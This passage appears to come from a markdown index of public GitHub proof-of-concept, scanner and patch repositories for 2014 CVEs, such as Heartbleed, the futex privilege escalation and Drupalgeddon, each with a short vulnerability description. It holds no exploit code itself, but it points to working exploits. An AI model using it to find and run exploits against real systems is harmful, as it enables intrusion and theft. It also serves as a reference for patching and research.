The compat_sys_recvmmsg function in net/compat.c in the Linux kernel before 3.13.2, when CONFIG_X86_X32 is enabled, allows local users to gain privileges via a recvmmsg system call with a crafted timeout pointer parameter.

- [saelo/cve-2014-0038](https://github.com/saelo/cve-2014-0038)
- [kiruthikan99/IT19115276](https://github.com/kiruthikan99/IT19115276)

### CVE-2014-0043 (2017-10-02)

In Apache Wicket 1.5.10 or 6.13.0, by issuing requests to special urls handled by Wicket, it is possible to check for the existence of particular classes in the classpath and thus check whether a third party library with a known security vulnerability is in use.

- [JJK96/JavaClasspathEnum](https://github.com/JJK96/JavaClasspathEnum)

### CVE-2014-0050 (2014-03-28)

MultipartStream.java in Apache Commons FileUpload before 1.3.1, as used in Apache Tomcat, JBoss Web, and other products, allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via a crafted Content-Type header that bypasses a loop's intended exit conditions.

- [jrrdev/cve-2014-0050](https://github.com/jrrdev/cve-2014-0050)

### CVE-2014-0094 (2014-03-10)

The ParametersInterceptor in Apache Struts before 2.3.16.2 allows remote attackers to "manipulate" the ClassLoader via the class parameter, which is passed to the getClass method.

- [HasegawaTadamitsu/CVE-2014-0094-test-program-for-struts1](https://github.com/HasegawaTadamitsu/CVE-2014-0094-test-program-for-struts1)
- [y0d3n/CVE-2014-0094](https://github.com/y0d3n/CVE-2014-0094)

### CVE-2014-0114 (2014-04-30)

Apache Commons BeanUtils, as distributed in lib/commons-beanutils-1.8.0.jar in Apache Struts 1.x through 1.3.10 and in other products requiring commons-beanutils through 1.9.2, does not suppress the class property, which allows remote attackers to "manipulate" the ClassLoader and execute arbitrary code via the class parameter, as demonstrated by the passing of this parameter to the getClass method of the ActionForm object in Struts 1.

- [rgielen/struts1filter](https://github.com/rgielen/struts1filter)
- [ricedu/struts1-patch](https://github.com/ricedu/struts1-patch)
- [aenlr/strutt-cve-2014-0114](https://github.com/aenlr/strutt-cve-2014-0114)

### CVE-2014-0130 (2014-05-07)

Directory traversal vulnerability in actionpack/lib/abstract_controller/base.rb in the implicit-render implementation in Ruby on Rails before 3.2.18, 4.0.x before 4.0.5, and 4.1.x before 4.1.1, when certain route globbing configurations are enabled, allows remote attackers to read arbitrary files via a crafted request.

- [omarkurt/cve-2014-0130](https://github.com/omarkurt/cve-2014-0130)

### CVE-2014-0160 (2014-04-07)

The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.

- [FiloSottile/Heartbleed](https://github.com/FiloSottile/Heartbleed)
- [titanous/heartbleeder](https://github.com/titanous/heartbleeder)
- [DominikTo/bleed](https://github.com/DominikTo/bleed)
- [cyphar/heartthreader](https://github.com/cyphar/heartthreader)
- [jdauphant/patch-openssl-CVE-2014-0160](https://github.com/jdauphant/patch-openssl-CVE-2014-0160)
- [musalbas/heartbleed-masstest](https://github.com/musalbas/heartbleed-masstest)
- [obayesshelton/CVE-2014-0160-Scanner](https://github.com/obayesshelton/CVE-2014-0160-Scanner)
- [Lekensteyn/pacemaker](https://github.com/Lekensteyn/pacemaker)
- [isgroup/openmagic](https://github.com/isgroup/openmagic)
- [fb1h2s/CVE-2014-0160](https://github.com/fb1h2s/CVE-2014-0160)
- [takeshixx/ssl-heartbleed.nse](https://github.com/takeshixx/ssl-heartbleed.nse)
- [roganartu/heartbleedchecker-chrome](https://github.com/roganartu/heartbleedchecker-chrome)
- [zouguangxian/heartbleed](https://github.com/zouguangxian/heartbleed)
- [sensepost/heartbleed-poc](https://github.com/sensepost/heartbleed-poc)
- [proactiveRISK/heartbleed-extention](https://github.com/proactiveRISK/heartbleed-extention)
- [amerine/coronary](https://github.com/amerine/coronary)
- [0x90/CVE-2014-0160](https://github.com/0x90/CVE-2014-0160)
- [ice-security88/CVE-2014-0160](https://github.com/ice-security88/CVE-2014-0160)
- [waqasjamal-zz/HeartBleed-Vulnerability-Checker](https://github.com/waqasjamal-zz/HeartBleed-Vulnerability-Checker)
- [siddolo/knockbleed](https://github.com/siddolo/knockbleed)
- [sammyfung/openssl-heartbleed-fix](https://github.com/sammyfung/openssl-heartbleed-fix)
- [a0726h77/heartbleed-test](https://github.com/a0726h77/heartbleed-test)
- [pblittle/aws-suture](https://github.com/pblittle/aws-suture)
- [hreese/heartbleed-dtls](https://github.com/hreese/heartbleed-dtls)
- [wwwiretap/bleeding_onions](https://github.com/wwwiretap/bleeding_onions)
- [idkqh7/heatbleeding](https://github.com/idkqh7/heatbleeding)
- [GeeksXtreme/ssl-heartbleed.nse](https://github.com/GeeksXtreme/ssl-heartbleed.nse)
- [xlucas/heartbleed](https://github.com/xlucas/heartbleed)
- [indiw0rm/-Heartbleed-](https://github.com/indiw0rm/-Heartbleed-)
- [einaros/heartbleed-tools](https://github.com/einaros/heartbleed-tools)
- [mozilla-services/Heartbleed](https://github.com/mozilla-services/Heartbleed)
- [yryz/heartbleed.js](https://github.com/yryz/heartbleed.js)
- [DisK0nn3cT/MaltegoHeartbleed](https://github.com/DisK0nn3cT/MaltegoHeartbleed)
- [OffensivePython/HeartLeak](https://github.com/OffensivePython/HeartLeak)
- [vortextube/ssl_scanner](https://github.com/vortextube/ssl_scanner)
- [mpgn/heartbleed-PoC](https://github.com/mpgn/heartbleed-PoC)
- [xanas/heartbleed.py](https://github.com/xanas/heartbleed.py)
- [iSCInc/heartbleed](https://github.com/iSCInc/heartbleed)
- [marstornado/cve-2014-0160-Yunfeng-Jiang](https://github.com/marstornado/cve-2014-0160-Yunfeng-Jiang)
- [hmlio/vaas-cve-2014-0160](https://github.com/hmlio/vaas-cve-2014-0160)
- [hybridus/heartbleedscanner](https://github.com/hybridus/heartbleedscanner)
- [froyo75/Heartbleed_Dockerfile_with_Nginx](https://github.com/froyo75/Heartbleed_Dockerfile_with_Nginx)
- [Xyl2k/CVE-2014-0160-Chrome-Plugin](https://github.com/Xyl2k/CVE-2014-0160-Chrome-Plugin)
- [caiqiqi/OpenSSL-HeartBleed-CVE-2014-0160-PoC](https://github.com/caiqiqi/OpenSSL-HeartBleed-CVE-2014-0160-PoC)
- [Saymeis/HeartBleed](https://github.com/Saymeis/HeartBleed)
- [cved-sources/cve-2014-0160](https://github.com/cved-sources/cve-2014-0160)
- [cheese-hub/heartbleed](https://github.com/cheese-hub/heartbleed)
- [artofscripting-zz/cmty-ssl-heartbleed-CVE-2014-0160-HTTP-HTTPS](https://github.com/artofscripting-zz/cmty-ssl-heartbleed-CVE-2014-0160-HTTP-HTTPS)
- [cldme/heartbleed-bug](https://github.com/cldme/heartbleed-bug)
- [ThanHuuTuan/Heartexploit](https://github.com/ThanHuuTuan/Heartexploit)
- [rouze-d/heartbleed](https://github.com/rouze-d/heartbleed)
- [WildfootW/CVE-2014-0160_OpenSSL_1.0.1f_Heartbleed](https://github.com/WildfootW/CVE-2014-0160_OpenSSL_1.0.1f_Heartbleed)
- [GuillermoEscobero/heartbleed](https://github.com/GuillermoEscobero/heartbleed)
- [anthophilee/A2SV--SSL-VUL-Scan](https://github.com/anthophilee/A2SV--SSL-VUL-Scan)
- [ingochris/heartpatch.us](https://github.com/ingochris/heartpatch.us)
- [belmind/heartbleed](https://github.com/belmind/heartbleed)
- [pierceoneill/bleeding-heart](https://github.com/pierceoneill/bleeding-heart)
- [h3xcr4ck3r/CVE-2014-0160_Heartbleed](https://github.com/h3xcr4ck3r/CVE-2014-0160_Heartbleed)
- [GardeniaWhite/fuzzing](https://github.com/GardeniaWhite/fuzzing)
- [undacmic/heartbleed-proof-of-concept](https://github.com/undacmic/heartbleed-proof-of-concept)
- [cbk914/heartbleed-checker](https://github.com/cbk914/heartbleed-checker)
- [MrE-Fog/CVE-2014-0160-Chrome-Plugin](https://github.com/MrE-Fog/CVE-2014-0160-Chrome-Plugin)
- [timsonner/cve-2014-0160-heartbleed](https://github.com/timsonner/cve-2014-0160-heartbleed)
- [Yash-Thakkar77/CVE-2014-0160-HeartBleed](https://github.com/Yash-Thakkar77/CVE-2014-0160-HeartBleed)

### CVE-2014-0166 (2014-04-09)

The wp_validate_auth_cookie function in wp-includes/pluggable.php in WordPress before 3.7.2 and 3.8.x before 3.8.2 does not properly determine the validity of authentication cookies, which makes it easier for remote attackers to obtain access via a forged cookie.

- [Ettack/POC-CVE-2014-0166](https://github.com/Ettack/POC-CVE-2014-0166)

### CVE-2014-0195 (2014-06-05)

The dtls1_reassemble_fragment function in d1_both.c in OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly validate fragment lengths in DTLS ClientHello messages, which allows remote attackers to execute arbitrary code or cause a denial of service (buffer overflow and application crash) via a long non-initial fragment.

- [ricedu/CVE-2014-0195](https://github.com/ricedu/CVE-2014-0195)

### CVE-2014-0196 (2014-05-07)

The n_tty_write function in drivers/tty/n_tty.c in the Linux kernel through 3.14.3 does not properly manage tty driver access in the "LECHO & !OPOST" case, which allows local users to cause a denial of service (memory corruption and system crash) or gain privileges by triggering a race condition involving read and write operations with long strings.

- [SunRain/CVE-2014-0196](https://github.com/SunRain/CVE-2014-0196)
- [tempbottle/CVE-2014-0196](https://github.com/tempbottle/CVE-2014-0196)

### CVE-2014-0224 (2014-06-05)

OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly restrict processing of ChangeCipherSpec messages, which allows man-in-the-middle attackers to trigger use of a zero-length master key in certain OpenSSL-to-OpenSSL communications, and consequently hijack sessions or obtain sensitive information, via a crafted TLS handshake, aka the "CCS Injection" vulnerability.

- [Tripwire/OpenSSL-CCS-Inject-Test](https://github.com/Tripwire/OpenSSL-CCS-Inject-Test)
- [iph0n3/CVE-2014-0224](https://github.com/iph0n3/CVE-2014-0224)
- [droptables/ccs-eval](https://github.com/droptables/ccs-eval)
- [ssllabs/openssl-ccs-cve-2014-0224](https://github.com/ssllabs/openssl-ccs-cve-2014-0224)
- [secretnonempty/CVE-2014-0224](https://github.com/secretnonempty/CVE-2014-0224)

### CVE-2014-0226 (2014-07-20)

Race condition in the mod_status module in the Apache HTTP Server before 2.4.10 allows remote attackers to cause a denial of service (heap-based buffer overflow), or possibly obtain sensitive credential information or execute arbitrary code, via a crafted request that triggers improper scoreboard handling within the status_handler function in modules/generators/mod_status.c and the lua_ap_scoreboard_worker function in modules/lua/lua_request.c.

- [shreesh1/CVE-2014-0226-poc](https://github.com/shreesh1/CVE-2014-0226-poc)

### CVE-2014-0282 (2014-06-11)

Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-1775, CVE-2014-1779, CVE-2014-1799, CVE-2014-1803, and CVE-2014-2757.

- [Charmve/PyStegosploit](https://github.com/Charmve/PyStegosploit)

### CVE-2014-0291
- [niccoX/patch-openssl-CVE-2014-0291_CVE-2015-0204](https://github.com/niccoX/patch-openssl-CVE-2014-0291_CVE-2015-0204)

### CVE-2014-0472 (2014-04-23)

The django.core.urlresolvers.reverse function in Django before 1.4.11, 1.5.x before 1.5.6, 1.6.x before 1.6.3, and 1.7.x before 1.7 beta 2 allows remote attackers to import and execute arbitrary Python modules by leveraging a view that constructs URLs using user input and a "dotted Python path."

- [christasa/CVE-2014-0472](https://github.com/christasa/CVE-2014-0472)

### CVE-2014-0521 (2014-05-14)

Adobe Reader and Acrobat 10.x before 10.1.10 and 11.x before 11.0.07 on Windows and OS X do not properly implement JavaScript APIs, which allows remote attackers to obtain sensitive information via a crafted PDF document.

- [molnarg/cve-2014-0521](https://github.com/molnarg/cve-2014-0521)

### CVE-2014-0816 (2014-02-27)

Unspecified vulnerability in Norman Security Suite 10.1 and earlier allows local users to gain privileges via unknown vectors.

- [tandasat/CVE-2014-0816](https://github.com/tandasat/CVE-2014-0816)

### CVE-2014-0993 (2014-09-15)

Buffer overflow in the Vcl.Graphics.TPicture.Bitmap implementation in the Visual Component Library (VCL) in Embarcadero Delphi XE6 20.0.15596.9843 and C++ Builder XE6 20.0.15596.9843 allows remote attackers to execute arbitrary code via a crafted BMP file.

- [helpsystems/Embarcadero-Workaround](https://github.com/helpsystems/Embarcadero-Workaround)

### CVE-2014-160
- [menrcom/CVE-2014-160](https://github.com/menrcom/CVE-2014-160)
- [GitMirar/heartbleed_exploit](https://github.com/GitMirar/heartbleed_exploit)

### CVE-2014-1266 (2014-02-22)

The SSLVerifySignedServerKeyExchange function in libsecurity_ssl/lib/sslKeyExchange.c in the Secure Transport feature in the Data Security component in Apple iOS 6.x before 6.1.6 and 7.x before 7.0.6, Apple TV 6.x before 6.0.2, and Apple OS X 10.9.x before 10.9.2 does not check the signature in a TLS Server Key Exchange message, which allows man-in-the-middle attackers to spoof SSL servers by (1) using an arbitrary private key for the signing step or (2) omitting the signing step.

- [landonf/Testability-CVE-2014-1266](https://github.com/landonf/Testability-CVE-2014-1266)
- [linusyang/SSLPatch](https://github.com/linusyang/SSLPatch)
- [gabrielg/CVE-2014-1266-poc](https://github.com/gabrielg/CVE-2014-1266-poc)
- [meetlight942/PentesterLab-Intercept-CVE-2014-1266](https://github.com/meetlight942/PentesterLab-Intercept-CVE-2014-1266)

### CVE-2014-1303 (2014-03-26)

Heap-based buffer overflow in Apple Safari 7.0.2 allows remote attackers to execute arbitrary code and bypass a sandbox protection mechanism via unspecified vectors, as demonstrated by Liang Chen during a Pwn2Own competition at CanSecWest 2014.

- [RKX1209/CVE-2014-1303](https://github.com/RKX1209/CVE-2014-1303)

### CVE-2014-1322 (2014-04-23)

The kernel in Apple OS X through 10.9.2 places a kernel pointer into an XNU object data structure accessible from user space, which makes it easier for local users to bypass the ASLR protection mechanism by reading an unspecified attribute of the object.

- [raymondpittman/IPC-Memory-Mac-OSX-Exploit](https://github.com/raymondpittman/IPC-Memory-Mac-OSX-Exploit)

### CVE-2014-1447 (2014-01-24)

Race condition in the virNetServerClientStartKeepAlive function in libvirt before 1.2.1 allows remote attackers to cause a denial of service (libvirtd crash) by closing a connection before a keepalive response is sent.

- [tagatac/libvirt-CVE-2014-1447](https://github.com/tagatac/libvirt-CVE-2014-1447)

### CVE-2014-1677 (2017-04-03)

Technicolor TC7200 with firmware STD6.01.12 could allow remote attackers to obtain sensitive information.

- [tihmstar/freePW_tc7200Eploit](https://github.com/tihmstar/freePW_tc7200Eploit)

### CVE-2014-1767 (2014-07-08)

Double free vulnerability in the Ancillary Function Driver (AFD) in afd.sys in the kernel-mode drivers in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows local users to gain privileges via a crafted application, aka "Ancillary Function Driver Elevation of Privilege Vulnerability."

- [ExploitCN/CVE-2014-1767-EXP-PAPER](https://github.com/ExploitCN/CVE-2014-1767-EXP-PAPER)

### CVE-2014-1773 (2014-06-11)

Microsoft Internet Explorer 9 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-1783, CVE-2014-1784, CVE-2014-1786, CVE-2014-1795, CVE-2014-1805, CVE-2014-2758, CVE-2014-2759, CVE-2014-2765, CVE-2014-2766, and CVE-2014-2775.

- [day6reak/CVE-2014-1773](https://github.com/day6reak/CVE-2014-1773)

### CVE-2014-1812 (2014-05-14)

The Group Policy implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 does not properly handle distribution of passwords, which allows remote authenticated users to obtain sensitive credential information and consequently gain privileges by leveraging access to the SYSVOL share, as exploited in the wild in May 2014, aka "Group Policy Preferences Password Elevation of Privilege Vulnerability."

- [mauricelambert/gpp-encrypt](https://github.com/mauricelambert/gpp-encrypt)

### CVE-2014-2064 (2014-10-17)

The loadUserByUsername function in hudson/security/HudsonPrivateSecurityRealm.java in Jenkins before 1.551 and LTS before 1.532.2 allows remote attackers to determine whether a user exists via vectors related to failed login attempts.

- [Naramsim/Offensive](https://github.com/Naramsim/Offensive)

### CVE-2014-2321 (2014-03-11)

web_shell_cmd.gch on ZTE F460 and F660 cable modems allows remote attackers to obtain administrative access via sendcmd requests, as demonstrated by using "set TelnetCfg" commands to enable a TELNET service with specified credentials.

- [injectionmethod/ZTE-Vuln-4-Skids](https://github.com/injectionmethod/ZTE-Vuln-4-Skids)
- [injectionmethod/Windows-ZTE-Loader](https://github.com/injectionmethod/Windows-ZTE-Loader)

### CVE-2014-2323 (2014-03-14)

SQL injection vulnerability in mod_mysql_vhost.c in lighttpd before 1.4.35 allows remote attackers to execute arbitrary SQL commands via the host name, related to request_check_hostname.

- [cirocosta/lighty-sqlinj-demo](https://github.com/cirocosta/lighty-sqlinj-demo)

### CVE-2014-2324 (2014-03-14)

Multiple directory traversal vulnerabilities in (1) mod_evhost and (2) mod_simple_vhost in lighttpd before 1.4.35 allow remote attackers to read arbitrary files via a .. (dot dot) in the host name, related to request_check_hostname.

- [sp4c30x1/uc_httpd_exploit](https://github.com/sp4c30x1/uc_httpd_exploit)

### CVE-2014-2383 (2014-04-28)

dompdf.php in dompdf before 0.6.1, when DOMPDF_ENABLE_PHP is enabled, allows context-dependent attackers to bypass chroot protections and read arbitrary files via a PHP protocol and wrappers in the input_file parameter, as demonstrated by a php://filter/read=convert.base64-encode/resource in the input_file parameter.

- [Relativ3Pa1n/CVE-2014-2383-LFI-to-RCE-Escalation](https://github.com/Relativ3Pa1n/CVE-2014-2383-LFI-to-RCE-Escalation)

### CVE-2014-2630 (2014-08-12)

Unspecified vulnerability in HP Operations Agent 11.00, when Glance is used, allows local users to gain privileges via unknown vectors.

- [redtimmy/perf-exploiter](https://github.com/redtimmy/perf-exploiter)

### CVE-2014-2734 (2014-04-24)

The openssl extension in Ruby 2.x does not properly maintain the state of process memory after a file is reopened, which allows remote attackers to spoof signatures within the context of a Ruby script that attempts signature verification after performing a certain sequence of filesystem operations. NOTE: this issue has been disputed by the Ruby OpenSSL team and third parties, who state that the original demonstration PoC contains errors and redundant or unnecessarily-complex code that does not appear to be related to a demonstration of the issue. As of 20140502, CVE is not aware of any public comment by the original researcher.

- [gdisneyleugers/CVE-2014-2734](https://github.com/gdisneyleugers/CVE-2014-2734)
- [adrienthebo/cve-2014-2734](https://github.com/adrienthebo/cve-2014-2734)

### CVE-2014-2815 (2014-08-12)

Microsoft OneNote 2007 SP3 allows remote attackers to execute arbitrary code via a crafted OneNote file that triggers creation of an executable file in a startup folder, aka "OneNote Remote Code Execution Vulnerability."

- [Edubr2020/CABTrap_OneNote2007](https://github.com/Edubr2020/CABTrap_OneNote2007)

### CVE-2014-3120 (2014-07-28)

The default configuration in Elasticsearch before 1.2 enables dynamic scripting, which allows remote attackers to execute arbitrary MVEL expressions and Java code via the source parameter to _search. NOTE: this only violates the vendor's intended security policy if the user does not run Elasticsearch in its own independent virtual machine.

- [jeffgeiger/es_inject](https://github.com/jeffgeiger/es_inject)
- [echohtp/ElasticSearch-CVE-2014-3120](https://github.com/echohtp/ElasticSearch-CVE-2014-3120)
- [xpgdgit/CVE-2014-3120](https://github.com/xpgdgit/CVE-2014-3120)

### CVE-2014-3153 (2014-06-07)

The futex_requeue function in kernel/futex.c in the Linux kernel through 3.14.5 does not ensure that calls have two different futex addresses, which allows local users to gain privileges via a crafted FUTEX_REQUEUE command that facilitates unsafe waiter modification.

- [timwr/CVE-2014-3153](https://github.com/timwr/CVE-2014-3153)
- [android-rooting-tools/libfutex_exploit](https://github.com/android-rooting-tools/libfutex_exploit)
- [geekben/towelroot](https://github.com/geekben/towelroot)
- [lieanu/CVE-2014-3153](https://github.com/lieanu/CVE-2014-3153)
- [zerodavinci/CVE-2014-3153-exploit](https://github.com/zerodavinci/CVE-2014-3153-exploit)
- [c3c/CVE-2014-3153](https://github.com/c3c/CVE-2014-3153)
- [dangtunguyen/TowelRoot](https://github.com/dangtunguyen/TowelRoot)
- [elongl/CVE-2014-3153](https://github.com/elongl/CVE-2014-3153)
- [c4mx/Linux-kernel-code-injection_CVE-2014-3153](https://github.com/c4mx/Linux-kernel-code-injection_CVE-2014-3153)

### CVE-2014-3341 (2014-08-19)

The SNMP module in Cisco NX-OS 7.0(3)N1(1) and earlier on Nexus 5000 and 6000 devices provides different error messages for invalid requests depending on whether the VLAN ID exists, which allows remote attackers to enumerate VLANs via a series of requests, aka Bug ID CSCup85616.

- [ehabhussein/snmpvlan](https://github.com/ehabhussein/snmpvlan)

### CVE-2014-3466 (2014-06-03)

Buffer overflow in the read_server_hello function in lib/gnutls_handshake.c in GnuTLS before 3.1.25, 3.2.x before 3.2.15, and 3.3.x before 3.3.4 allows remote servers to cause a denial of service (memory corruption) or possibly execute arbitrary code via a long session id in a ServerHello message.

- [azet/CVE-2014-3466_PoC](https://github.com/azet/CVE-2014-3466_PoC)

### CVE-2014-3507 (2014-08-13)

Memory leak in d1_both.c in the DTLS implementation in OpenSSL 0.9.8 before 0.9.8zb, 1.0.0 before 1.0.0n, and 1.0.1 before 1.0.1i allows remote attackers to cause a denial of service (memory consumption) via zero-length DTLS fragments that trigger improper handling of the return value of a certain insert function.

- [Satheesh575555/openSSL_1.0.1g_CVE-2014-3507](https://github.com/Satheesh575555/openSSL_1.0.1g_CVE-2014-3507)

### CVE-2014-3544 (2014-07-29)

Cross-site scripting (XSS) vulnerability in user/profile.php in Moodle through 2.3.11, 2.4.x before 2.4.11, 2.5.x before 2.5.7, 2.6.x before 2.6.4, and 2.7.x before 2.7.1 allows remote authenticated users to inject arbitrary web script or HTML via the Skype ID profile field.

- [aforesaid/MoodleHack](https://github.com/aforesaid/MoodleHack)

### CVE-2014-3551 (2014-07-29)

Multiple cross-site scripting (XSS) vulnerabilities in the advanced-grading implementation in Moodle through 2.3.11, 2.4.x before 2.4.11, 2.5.x before 2.5.7, 2.6.x before 2.6.4, and 2.7.x before 2.7.1 allow remote authenticated users to inject arbitrary web script or HTML via a crafted (1) qualification or (2) rating field in a rubric.

- [JavaGarcia/CVE-2014-3551](https://github.com/JavaGarcia/CVE-2014-3551)

### CVE-2014-3566 (2014-10-15)

The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other products, uses nondeterministic CBC padding, which makes it easier for man-in-the-middle attackers to obtain cleartext data via a padding-oracle attack, aka the "POODLE" issue.

- [mikesplain/CVE-2014-3566-poodle-cookbook](https://github.com/mikesplain/CVE-2014-3566-poodle-cookbook)
- [stdevel/poodle_protector](https://github.com/stdevel/poodle_protector)
- [cloudpassage/mangy-beast](https://github.com/cloudpassage/mangy-beast)
- [mpgn/poodle-PoC](https://github.com/mpgn/poodle-PoC)
- [uthrasri/openssl_g2.5_CVE-2014-3566](https://github.com/uthrasri/openssl_g2.5_CVE-2014-3566)

### CVE-2014-3570 (2015-01-09)

The BN_sqr implementation in OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k does not properly calculate the square of a BIGNUM value, which might make it easier for remote attackers to defeat cryptographic protection mechanisms via unspecified vectors, related to crypto/bn/asm/mips.pl, crypto/bn/asm/x86_64-gcc.c, and crypto/bn/bn_asm.c.

- [uthrasri/openssl_G2.5_CVE-2014-3570](https://github.com/uthrasri/openssl_G2.5_CVE-2014-3570)
- [uthrasri/Openssl_G2.5_CVE-2014-3570_01](https://github.com/uthrasri/Openssl_G2.5_CVE-2014-3570_01)
- [uthrasri/CVE-2014-3570](https://github.com/uthrasri/CVE-2014-3570)
- [uthrasri/CVE-2014-3570_G2.5_openssl_no_patch](https://github.com/uthrasri/CVE-2014-3570_G2.5_openssl_no_patch)

### CVE-2014-3625 (2014-11-20)

Directory traversal vulnerability in Pivotal Spring Framework 3.0.4 through 3.2.x before 3.2.12, 4.0.x before 4.0.8, and 4.1.x before 4.1.2 allows remote attackers to read arbitrary files via unspecified vectors, related to static resource handling.

- [ilmila/springcss-cve-2014-3625](https://github.com/ilmila/springcss-cve-2014-3625)
- [gforresu/SpringPathTraversal](https://github.com/gforresu/SpringPathTraversal)

### CVE-2014-3704 (2014-10-16)

The expandArguments function in the database abstraction API in Drupal core 7.x before 7.32 does not properly construct prepared statements, which allows remote attackers to conduct SQL injection attacks via an array containing crafted keys.

- [happynote3966/CVE-2014-3704](https://github.com/happynote3966/CVE-2014-3704)
- [AleDiBen/Drupalgeddon](https://github.com/AleDiBen/Drupalgeddon)

### CVE-2014-4014 (2014-06-23)

The capabilities implementation in the Linux kernel before 3.14.8 does not properly consider that namespaces are inapplicable to inodes, which allows local users to bypass intended chmod restrictions by first creating a user namespace, as demonstrated by setting the setgid bit on a file with group ownership of root.

- [vnik5287/cve-2014-4014-privesc](https://github.com/vnik5287/cve-2014-4014-privesc)

### CVE-2014-4076 (2014-11-11)

Microsoft Windows Server 2003 SP2 allows local users to gain privileges via a crafted IOCTL call to (1) tcpip.sys or (2) tcpip6.sys, aka "TCP/IP Elevation of Privilege Vulnerability."

- [fungoshacks/CVE-2014-4076](https://github.com/fungoshacks/CVE-2014-4076)

### CVE-2014-4109 (2014-09-10)

Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4110, and CVE-2014-4111.

- [day6reak/CVE-2014-4109](https://github.com/day6reak/CVE-2014-4109)

### CVE-2014-4113 (2014-10-15)

win32k.sys in the kernel-mode drivers in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows local users to gain privileges via a crafted application, as exploited in the wild in October 2014, aka "Win32k.sys Elevation of Privilege Vulnerability."

- [johnjohnsp1/CVE-2014-4113](https://github.com/johnjohnsp1/CVE-2014-4113)
- [nsxz/Exploit-CVE-2014-4113](https://github.com/nsxz/Exploit-CVE-2014-4113)
- [sam-b/CVE-2014-4113](https://github.com/sam-b/CVE-2014-4113)
- [wikiZ/cve-2014-4113](https://github.com/wikiZ/cve-2014-4113)

### CVE-2014-4140 (2014-10-15)

Microsoft Internet Explorer 8 through 11 allows remote attackers to bypass the ASLR protection mechanism via a crafted web site, aka "Internet Explorer ASLR Bypass Vulnerability."

- [day6reak/CVE-2014-4140](https://github.com/day6reak/CVE-2014-4140)

### CVE-2014-4210 (2014-07-17)

Unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.0.2.0 and 10.3.6.0 allows remote attackers to affect confidentiality via vectors related to WLS - Web Services.

- [NoneNotNull/SSRFX](https://github.com/NoneNotNull/SSRFX)
- [0xn0ne/weblogicScanner](https://github.com/0xn0ne/weblogicScanner)
- [unmanarc/CVE-2014-4210-SSRF-PORTSCANNER-POC](https://github.com/unmanarc/CVE-2014-4210-SSRF-PORTSCANNER-POC)
- [NHPT/WebLogic-SSRF_CVE-2014-4210](https://github.com/NHPT/WebLogic-SSRF_CVE-2014-4210)

### CVE-2014-4321
- [android-rooting-tools/libmsm_vfe_read_exploit](https://github.com/android-rooting-tools/libmsm_vfe_read_exploit)

### CVE-2014-4322 (2014-12-24)

drivers/misc/qseecom.c in the QSEECOM driver for the Linux kernel 3.x, as used in Qualcomm Innovation Center (QuIC) Android contributions for MSM devices and other products, does not validate certain offset, length, and base values within an ioctl call, which allows attackers to gain privileges or cause a denial of service (memory corruption) via a crafted application.

- [retme7/CVE-2014-4322_poc](https://github.com/retme7/CVE-2014-4322_poc)
- [laginimaineb/cve-2014-4322](https://github.com/laginimaineb/cve-2014-4322)
- [askk/CVE-2014-4322_adaptation](https://github.com/askk/CVE-2014-4322_adaptation)
- [koozxcv/CVE-2014-4322](https://github.com/koozxcv/CVE-2014-4322)

### CVE-2014-4323 (2014-12-12)

The mdp_lut_hw_update function in drivers/video/msm/mdp.c in the MDP display driver for the Linux kernel 3.x, as used in Qualcomm Innovation Center (QuIC) Android contributions for MSM devices and other products, does not validate certain start and length values within an ioctl call, which allows attackers to gain privileges via a crafted application.

- [marcograss/cve-2014-4323](https://github.com/marcograss/cve-2014-4323)

### CVE-2014-4377 (2014-09-18)

Integer overflow in CoreGraphics in Apple iOS before 8 and Apple TV before 7 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted PDF document.

- [feliam/CVE-2014-4377](https://github.com/feliam/CVE-2014-4377)
- [davidmurray/CVE-2014-4377](https://github.com/davidmurray/CVE-2014-4377)

### CVE-2014-4378 (2014-09-18)

CoreGraphics in Apple iOS before 8 and Apple TV before 7 allows remote attackers to obtain sensitive information or cause a denial of service (out-of-bounds read and application crash) via a crafted PDF document.

- [feliam/CVE-2014-4378](https://github.com/feliam/CVE-2014-4378)

### CVE-2014-4481 (2015-01-30)

Integer overflow in CoreGraphics in Apple iOS before 8.1.3, Apple OS X before 10.10.2, and Apple TV before 7.0.3 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted PDF document.

- [feliam/CVE-2014-4481](https://github.com/feliam/CVE-2014-4481)

### CVE-2014-4511 (2014-07-22)

